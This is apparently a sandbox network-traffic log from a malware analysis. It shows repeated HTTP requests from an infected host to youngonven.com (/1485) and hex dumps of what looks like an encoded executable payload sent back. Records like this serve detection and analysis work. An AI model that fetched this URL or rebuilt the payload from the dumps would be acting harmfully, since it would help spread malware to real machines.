Oct 8, 2024 11:32:04.402704000 CEST	1236	IN	Data Raw: db d5 d5 db 2a 2a 29 d7 d0 22 24 21 db cd da 06 36 36 06 39 03 01 01 34 01 2f 06 2d 31 ff 09 45 47 f6 49 f3 f5 f5 f8 f2 f2 41 13 46 2d ef ee 06 db e9 0a d3 ea d6 d9 d3 ed dc dc df cf e9 de 19 10 17 16 1b 19 e6 ec 11 e2 0e df 1c 13 e3 10 45 fc 48 Data Ascii: **)"$!6694/-1EGIAF-EHIEHBBC@K>A6-::.-<2-:_`fgfOUVQ~~\|wQlZ^gUSQQMglfj`cc{zxxsqt~}
Oct 8, 2024 11:32:04.402714014 CEST	1236	IN	Data Raw: 7a c7 c9 bd 73 c5 74 6d 72 c1 6d 89 b9 86 89 87 b7 b1 8c 84 b8 b2 84 7d 7f b4 83 e6 16 e6 e9 e6 e9 17 eb 11 e1 e5 0d dd 10 e2 e2 db 25 29 2a 29 2b 2b d6 ce d0 d3 cf 24 23 1d cf 3c 95 81 06 0c 3b 37 36 fd 34 2f 23 3c 36 30 2e 40 42 4c 37 48 f5 fb Data Ascii: zstmrm}%)*)++$#<;764/#<60.@BL7HBA&+$"#"HLHKB>5852-/14keljke]a]abd[UVPUPPywwmsntytXYWTNTil
Oct 8, 2024 11:32:04.402725935 CEST	1236	IN	Data Raw: bf 74 6e bd 70 74 70 a5 5b a8 9e 5c ab 56 5c 9e 52 a2 9f 52 9e 4f 51 97 9a 96 96 99 93 9a 97 5d 93 62 91 61 8e 5e 91 ca 7c c8 77 c3 c9 c9 78 c4 73 bf c2 c1 73 be c9 af bb 88 b5 87 b5 b7 b6 b4 b7 83 82 7f 7f 7d af ec e7 dd 1c e7 ec e7 ec de e7 0e Data Ascii: tnptp[\V\RROQ]ba^\|wxss}&'&%(!8;7:<:8FGLD%((!### #$LEELGAB@C/98981324/39iildjj`f`jOY\\RXTQQZR~
Oct 8, 2024 11:32:04.402738094 CEST	1236	IN	Data Raw: a0 aa 52 9b a1 65 ac 98 a0 a7 a1 ab ac 5d 92 ab 9f 61 94 bc c7 ca b9 ca c8 6f 89 ad b2 b3 85 8b 7f 8a 83 7a 7c 7c 78 7a c6 77 c9 6e 74 c1 c4 bd c3 c2 8e 4f 5b 95 68 58 6b 66 55 5e 64 8d 63 54 61 91 59 61 5a 66 62 64 68 a9 5f 4d a0 60 5d 65 66 68 Data Ascii: Re]aoz\|\|xzwntO[hXkfU^dcTaYaZfbdh_M`]efhNvznqu}vpmuz},'8!%$"$$%-:=E:K:<BDC79?IIG%H4EA114&)90HFJ>B
Oct 8, 2024 11:32:04.402751923 CEST	1236	IN	Data Raw: f5 4b 45 48 f9 f7 f8 43 ee 46 44 3e 3f 3d f0 05 05 07 37 09 38 0a 39 31 e4 fe f2 00 d0 0a 05 9c 6c 6a 9a 95 6a 9a 67 68 92 8e 9a a2 8f 5e 93 a6 a6 4e a9 a7 5c 51 59 4f a2 a2 a2 4e 4d 4f a4 87 80 b7 bc bc 8c 86 8c 7f b2 80 84 8c 8c 7e 80 75 75 7b Data Ascii: KEHCFD>?=7891ljjgh^N\QYONMO~uu{tompXVUWNOeeld_dvuqppp&+(+, $ #8LJC=A@B &()"#
Oct 8, 2024 11:32:04.407994986 CEST	1236	IN	Data Raw: 47 f9 f8 f3 ef ef ed 42 ed ee ed 26 28 d7 29 da d9 26 21 1f 23 24 23 24 2c 1e ce 16 15 e7 1b 14 16 19 e5 11 de e1 e1 d4 cf de cd fc fc 35 ff 4b ff 39 ef fd 00 f5 ed f5 ee 43 f3 0b 3c 09 08 33 09 05 0b 2f 2f 2f 31 2d e6 08 42 98 9c 99 a8 98 a9 ac Data Ascii: GB&()&!#$#$,5K9C<3///1-BZThlcx~yx\|uysRlTWNPhT^`UVVXb\WX\Y_MTbbaadvuw{tsqqo~''+#$ 7:;

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.6	50004	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:32:15.526119947 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:32:16.125422955 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:32:15 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:32:16.125555992 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:32:16.125569105 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:32:16.125582933 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:32:16.125596046 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:32:16.125610113 CEST	1236	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:32:16.125622988 CEST	1236	IN	Data Raw: ad af 80 b0 ad b0 b4 e9 ea 17 e8 e8 e6 e7 e8 e4 e0 13 0d 11 13 ea e9 2c 27 dc d6 2c d8 dc dc 21 cf d1 22 1f cf ce d9 0b 0c 3b fe 07 36 0a 08 fd 07 02 fd 00 30 32 fe 4b 45 ed f5 47 f8 47 f7 ed f2 42 40 f3 f3 3f ee db dc 27 2a 23 2c db 26 22 1f ce Data Ascii: ,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;03`]lh_gb`c\\\ZQUTPTyspsosYXRRlhi]av\|qn
Oct 8, 2024 11:32:16.125637054 CEST	1000	IN	Data Raw: 9f a0 a0 6c 9b 66 98 96 67 96 66 5d 92 96 61 60 9b 6c 5d 80 79 7a 74 ae c5 c6 c7 74 6e c4 6f c4 6f c9 c0 b7 85 8a 87 ba b4 87 bc 84 ae 81 b1 bb 7f 86 89 2b 2c 1a 28 ce 11 16 21 12 13 1b db 0d df ea 0d d0 25 d6 d8 d9 dc d6 2b d4 1d 22 d2 d1 db cd Data Ascii: lfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!FJEFCE=C=KC;5-71783/4.2jc]c_bd^V\NNV[TQNS[V}yxrmnqqq
Oct 8, 2024 11:32:16.125649929 CEST	1236	IN	Data Raw: 75 78 72 c3 bd be 6f 73 be 6d c3 a0 8c 4d 59 9b 6a 56 6b 5a 63 5f 4f 50 94 63 4d 58 5b 6a 57 57 67 65 aa 63 69 62 4f a3 66 68 4e b7 7b 7d 6d 8a 88 af c6 c4 c0 be 74 6d c3 c3 bf b6 af b9 b9 88 b6 bc 85 b0 af b2 b5 b3 83 84 81 e7 e5 eb e7 e9 e5 e6 Data Ascii: uxrosmMYjVkZc_OPcMX[jWWgecibOfhN{}mtm4,#$895/./0FIH>,,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST
Oct 8, 2024 11:32:16.125663996 CEST	1236	IN	Data Raw: 62 64 61 6b 60 61 62 a5 5c 58 55 a7 59 58 a8 a0 4f 9f 4f 50 a3 9e 53 88 7f 88 89 b8 8a 86 82 7f 81 80 85 8b 81 83 84 c5 79 c8 7c ca c7 78 71 71 78 76 72 71 bf 7a c1 ac a8 59 a6 a3 89 76 70 73 90 68 9e 68 a0 54 a0 98 99 66 69 94 99 96 69 5d 97 62 Data Ascii: bdak`ab\XUYXOOPSy\|xqqxvrqzYvpshhTfii]b_a^x{u{\|rpot+')&,'L;J97DL/-GIGB* ?JJECLE=@D;5:;:731
Oct 8, 2024 11:32:16.130549908 CEST	1236	IN	Data Raw: 0d e3 e1 4a f6 47 47 f7 46 4b 4a f4 3e f2 46 ed 3e 44 40 35 3c 07 39 34 33 0c 3c 2f 2f 2f 2f 2f 2f 2f 2f 5f 5f b6 b8 ba b8 b6 b8 5f 8e 5f 94 92 61 93 63 57 a5 55 5b a8 a9 55 56 be c9 cb cc c4 c1 cc 50 b5 8c 7e 88 8a ba 8b b5 87 ae 7d 84 7e 83 8a Data Ascii: JGGFKJ>F>D@5<943<////////____acWU[UVP~}~xww\XWWTNNv}ZhY^wvxqrUX\Y}}+'((#<<54HK=B?)'#(*&,$

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	50005	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:32:23.653172970 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:32:24.244524002 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:32:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:32:24.244540930 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:32:24.244550943 CEST	448	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:32:24.244965076 CEST	1236	IN	Data Raw: 48 ee 45 41 f2 49 3d f3 66 97 68 c7 6a ca 6c 91 5e c0 60 bf 62 95 64 cd c7 a2 38 09 3a 0c 66 91 5f 61 64 61 91 63 64 a5 57 4e 5a a5 59 51 a6 4d 9e 56 55 5b 53 59 50 b9 80 89 85 87 86 87 88 84 81 83 ad b2 b2 7d 93 6d 94 95 b8 be c5 bb c9 cc 80 a3 Data Ascii: HEAI=fhjl^`bd8:f_adacdWNZYQMVU[SYP}m`USMQQjie^]`w\|mrs%,$ :559430G;68CECD(,%'%"#))
Oct 8, 2024 11:32:24.245066881 CEST	1236	IN	Data Raw: 40 f1 fa 25 d6 1d da d5 28 d7 28 ce d2 1d cf cf 1e d3 20 1c 17 e9 19 15 e9 e7 11 0f 0e 0d 10 1b 13 10 e1 f9 3f 3e f9 44 f6 f7 46 3f 42 44 46 3d 3f ed 44 3b 3b 0b 35 0a 36 3a 06 01 32 fe 34 32 32 04 fd 68 60 6b 69 6a 64 67 96 62 63 66 91 94 93 8e Data Ascii: @%(( ?>DF?BDF=?D;;56:2422h`kijdgbcfb\VMMXZWRTNNNPymw{womnnrmW\\ZYNMPOTl^{rmt}},)%%!" "7::333.
Oct 8, 2024 11:32:24.245078087 CEST	1236	IN	Data Raw: db d5 d5 db 2a 2a 29 d7 d0 22 24 21 db cd da 06 36 36 06 39 03 01 01 34 01 2f 06 2d 31 ff 09 45 47 f6 49 f3 f5 f5 f8 f2 f2 41 13 46 2d ef ee 06 db e9 0a d3 ea d6 d9 d3 ed dc dc df cf e9 de 19 10 17 16 1b 19 e6 ec 11 e2 0e df 1c 13 e3 10 45 fc 48 Data Ascii: **)"$!6694/-1EGIAF-EHIEHBBC@K>A6-::.-<2-:_`fgfOUVQ~~\|wQlZ^gUSQQMglfj`cc{zxxsqt~}
Oct 8, 2024 11:32:24.245086908 CEST	1236	IN	Data Raw: 7a c7 c9 bd 73 c5 74 6d 72 c1 6d 89 b9 86 89 87 b7 b1 8c 84 b8 b2 84 7d 7f b4 83 e6 16 e6 e9 e6 e9 17 eb 11 e1 e5 0d dd 10 e2 e2 db 25 29 2a 29 2b 2b d6 ce d0 d3 cf 24 23 1d cf 3c 95 81 06 0c 3b 37 36 fd 34 2f 23 3c 36 30 2e 40 42 4c 37 48 f5 fb Data Ascii: zstmrm}%)*)++$#<;764/#<60.@BL7HBA&+$"#"HLHKB>5852-/14keljke]a]abd[UVPUPPywwmsntytXYWTNTil
Oct 8, 2024 11:32:24.245098114 CEST	1236	IN	Data Raw: bf 74 6e bd 70 74 70 a5 5b a8 9e 5c ab 56 5c 9e 52 a2 9f 52 9e 4f 51 97 9a 96 96 99 93 9a 97 5d 93 62 91 61 8e 5e 91 ca 7c c8 77 c3 c9 c9 78 c4 73 bf c2 c1 73 be c9 af bb 88 b5 87 b5 b7 b6 b4 b7 83 82 7f 7f 7d af ec e7 dd 1c e7 ec e7 ec de e7 0e Data Ascii: tnptp[\V\RROQ]ba^\|wxss}&'&%(!8;7:<:8FGLD%((!### #$LEELGAB@C/98981324/39iildjj`f`jOY\\RXTQQZR~
Oct 8, 2024 11:32:24.245109081 CEST	1236	IN	Data Raw: a0 aa 52 9b a1 65 ac 98 a0 a7 a1 ab ac 5d 92 ab 9f 61 94 bc c7 ca b9 ca c8 6f 89 ad b2 b3 85 8b 7f 8a 83 7a 7c 7c 78 7a c6 77 c9 6e 74 c1 c4 bd c3 c2 8e 4f 5b 95 68 58 6b 66 55 5e 64 8d 63 54 61 91 59 61 5a 66 62 64 68 a9 5f 4d a0 60 5d 65 66 68 Data Ascii: Re]aoz\|\|xzwntO[hXkfU^dcTaYaZfbdh_M`]efhNvznqu}vpmuz},'8!%$"$$%-:=E:K:<BDC79?IIG%H4EA114&)90HFJ>B
Oct 8, 2024 11:32:24.245120049 CEST	1236	IN	Data Raw: f5 4b 45 48 f9 f7 f8 43 ee 46 44 3e 3f 3d f0 05 05 07 37 09 38 0a 39 31 e4 fe f2 00 d0 0a 05 9c 6c 6a 9a 95 6a 9a 67 68 92 8e 9a a2 8f 5e 93 a6 a6 4e a9 a7 5c 51 59 4f a2 a2 a2 4e 4d 4f a4 87 80 b7 bc bc 8c 86 8c 7f b2 80 84 8c 8c 7e 80 75 75 7b Data Ascii: KEHCFD>?=7891ljjgh^N\QYONMO~uu{tompXVUWNOeeld_dvuqppp&+(+, $ #8LJC=A@B &()"#
Oct 8, 2024 11:32:24.249572992 CEST	1236	IN	Data Raw: 47 f9 f8 f3 ef ef ed 42 ed ee ed 26 28 d7 29 da d9 26 21 1f 23 24 23 24 2c 1e ce 16 15 e7 1b 14 16 19 e5 11 de e1 e1 d4 cf de cd fc fc 35 ff 4b ff 39 ef fd 00 f5 ed f5 ee 43 f3 0b 3c 09 08 33 09 05 0b 2f 2f 2f 31 2d e6 08 42 98 9c 99 a8 98 a9 ac Data Ascii: GB&()&!#$#$,5K9C<3///1-BZThlcx~yx\|uysRlTWNPhT^`UVVXb\WX\Y_MTbbaadvuw{tsqqo~''+#$ 7:;

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.6	50007	63.250.38.167	80

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 11:32:32.166935921 CEST	68	OUT	GET /1485 HTTP/1.1 Host: youngonven.com Connection: Keep-Alive
Oct 8, 2024 11:32:32.793725014 CEST	1236	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 last-modified: Tue, 01 Oct 2024 05:33:56 GMT accept-ranges: bytes content-length: 579584 date: Tue, 08 Oct 2024 09:32:32 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed Data Raw: 1a 27 5d cd d0 cd cd cd d1 cd cd cd cc cc cd cd 85 cd cd cd cd cd cd cd 0d cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd 4d cd cd cd db ec 87 db cd 81 d6 9a ee 85 ce 19 9a ee 21 35 36 40 ed 3d 3f 3c 34 3f 2e 3a ed 30 2e 3b 3b 3c 41 ed 2f 32 ed 3f 42 3b ed 36 3b ed 11 1c 20 ed 3a 3c 31 32 fb da da d7 f1 cd cd cd cd cd cd cd 1d 12 cd cd 19 ce d0 cd 52 2f 3b b3 cd cd cd cd cd cd cd cd ad cd cf ee d8 ce fd cd cd 9f d5 cd cd a1 d5 cd cd cd cd cd f7 be d5 cd cd ed cd cd cd ed d6 cd cd cd 0d cd cd ed cd cd cd cf cd cd d1 cd cd cd cd cd cd cd d1 cd cd cd cd cd cd cd cd 0d d6 cd cd cf cd cd cd cd cd cd d0 cd 0d 52 cd cd dd cd cd dd cd cd cd cd dd cd cd dd cd cd cd cd cd cd dd cd cd cd cd cd cd cd cd cd cd cd 9d bd d5 cd 24 cd cd cd cd cd d6 cd dd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd ed d6 cd d9 cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd cd [TRUNCATED] Data Ascii: ']M!56@=?<4?.:0.;;<A/2?B;6; :<12R/;R$A2EA-?@?0?29<0u`mU0A6:2<BA:<C2A6:2<BA!'./0123S[~\fhg[kfd`zURbXcbjYrvc_fjQPzOST\|rlxqzziQuwuwRZ~c~t&)?A$"%?&, %&I40;I(83D-!.3;?DD:FI3C0FA>3+!51EL=VNQ`xnpumw\|rVQYYifMTMPelj
Oct 8, 2024 11:32:32.793741941 CEST	1236	IN	Data Raw: 95 98 65 8e 62 8e 90 91 5f 03 21 d6 2a d8 15 da 29 dc 26 cd 43 cf 35 6f cc 6d be 8c bb 88 b7 b7 86 b7 b6 83 b0 b0 ae 83 7f ba 80 16 17 e6 ec ea 18 16 e9 e2 0e e5 12 0f ec e2 0d d8 d9 d7 d8 d6 1a cb 87 17 be 83 18 d0 cf 1f d0 00 00 0c 0c 09 0a 09 Data Ascii: eb_!*)&C5om4LHED?A '&'#+#)KIG>B.6741/850.9__]fkiah`fcc]EGIL=?AC&')+!#HI/4
Oct 8, 2024 11:32:32.793754101 CEST	1236	IN	Data Raw: 88 ba b4 b0 bc b4 c3 cc c6 ca 6e c9 73 cc 7b 6f c3 c0 bd c1 c0 74 6f 54 57 68 6c 5a ac 5a a2 4d 52 9e 9d 9e 53 9f 51 68 97 9a 9c 6a 6b 9b 9c 94 5d 94 60 8f 91 63 90 7b 7c be 77 7a 65 6c 6c 50 c3 c1 6d bd 70 bd c0 86 b6 bc ad b3 bc b7 86 b8 b7 b6 Data Ascii: ns{otoTWhlZZMRSQhjk]`c{\|wzellPmp(+''*%!# 597859/C-CA?3LHLCDDA%'70>E3D91/04/0ijlkh]fkb[XWXVQU
Oct 8, 2024 11:32:32.793766022 CEST	1236	IN	Data Raw: 3c 31 39 9b 6c 97 95 6b 9a 67 66 61 5e 62 92 5e 92 5f 60 56 58 57 a9 5a aa ab 6c 5f 69 91 5e b1 bf c0 b7 a6 9e 75 73 95 7c 70 96 6f 6e b2 ad 7d b3 7e 7f 76 77 87 77 77 ca c7 75 73 bd c3 6e 71 73 72 c3 aa 9f 56 57 50 58 99 9a 9a 4d 8d 6f 56 64 6a Data Ascii: <19lkgfa^b^_`VXWZl_i^us\|pon}~vwwwusnqsrVWPXMoVdjll^uxtmqprt,),%+%::9;121:87H:7I>B=)),&%!"$*HLGJECB
Oct 8, 2024 11:32:32.793781996 CEST	1236	IN	Data Raw: e6 0d ea 06 e7 d5 0c d8 d4 e2 cf 0e 0e 12 dd fb fb 45 f5 47 48 41 fb ee 44 46 ed f2 f1 41 3d 3c 36 3b 38 3b 3c 06 3a 30 31 2f 2d e8 03 f3 f3 8f 97 91 97 98 96 67 66 67 60 61 91 91 62 69 5e a9 55 57 59 56 a9 56 a5 a1 50 53 a4 9d a2 a3 53 8a bc 8a Data Ascii: EGHADFA=<6;8;<:01/-gfg`abi^UWYVVPSS}vv\|uut{wrrrpTNMea^_{\|ptqtpA<!59::-.LFHELHC%
Oct 8, 2024 11:32:32.793792963 CEST	1120	IN	Data Raw: 2a 36 4b 3a 43 3f 2f 30 41 32 ff 48 ef 46 48 f6 4a 4a f7 ef 3f f4 41 ef 3f f4 ee 2c 27 27 d5 27 d6 25 29 1d 22 cf 24 cd cf 2a 03 ec e9 e4 e9 2b f7 02 e5 dd 10 e3 11 e4 14 0e 12 46 fc f7 f5 48 4b 4c 42 f3 ed f0 41 42 f3 44 3f 05 36 2d 0a 34 34 37 Data Ascii: 6K:C?/0A2HFHJJ?A?,'''%)"$+FHKLBABD?6-4475/.g]]ibbYZZ\TSXNTMTQ}~~z\|u{\|sxwwppyZW\TNRRkkhf{mqo,)'
Oct 8, 2024 11:32:32.793804884 CEST	1236	IN	Data Raw: 67 97 62 93 62 64 91 60 6b 5e 63 56 a5 5b 58 55 56 57 a8 58 a4 a3 51 9d 52 4f 53 80 b5 7e ba bc b6 b7 b9 81 7d b1 81 af af 84 89 6f cb 27 05 73 c7 c7 71 c3 c3 be 75 bf c3 70 71 5b a7 9d 5c 57 59 a8 a8 9d 53 a5 a1 a1 ab a2 a9 9a 98 9c 97 9a 67 91 Data Ascii: gbbd`k^cV[XUVWXQROS~}o'squpq[\WYSge]d^uyqq,',!";602KEGGB@?'*#,&"#""GIFLDLC>?KJC71;
Oct 8, 2024 11:32:32.793809891 CEST	1236	IN	Data Raw: df cd e5 25 df e6 e9 0b 0c fa 08 2d f3 f0 fc 44 ed 44 ed 4c 3e f3 3d 06 0b 09 39 3c 07 07 31 37 33 2d 01 3c 2f 3a 06 98 a5 a9 6b 9c 63 96 62 91 5f 65 a2 9f 98 8f 63 a5 55 59 4d 5c 5c 5b ab 53 a4 4e a4 5b 50 51 5a 8b ba b7 7d b8 b7 8a 89 84 7d 7e Data Ascii: %-DDL>=9<173-</:kcb_ecUYM\\[SN[PQZ}}~}vmzv{zqpmppPliYi[Slfgf]a`l]yzttnoo+,(!%+" ;;<-0-3KHLEFK==?C +',"'&!
Oct 8, 2024 11:32:32.793817043 CEST	1236	IN	Data Raw: 2e 2f 30 fa 46 49 fa fa 48 f8 fa 3e f8 ef ee f4 f2 f4 ee 2c 2a 2c 1e 24 11 0e 10 d4 f3 d1 1f 23 2c 1f d3 e8 16 ea ea 15 1a 15 15 10 e4 0e 13 dd 0f 10 de fb 4c 46 4b f8 43 4a 42 40 3d 3f f0 f2 4b 3e 40 39 0a 45 1d 21 1f 3c 37 04 33 02 ff 01 33 04 Data Ascii: ./0FIH>,*,$#,LFKCJB@=?K>@9E!<733-_]kik]ad^b[W[T\XST~}{pnz\|urqXihTNXRQQTeljg_Od{\|zo;(C ","(+ !
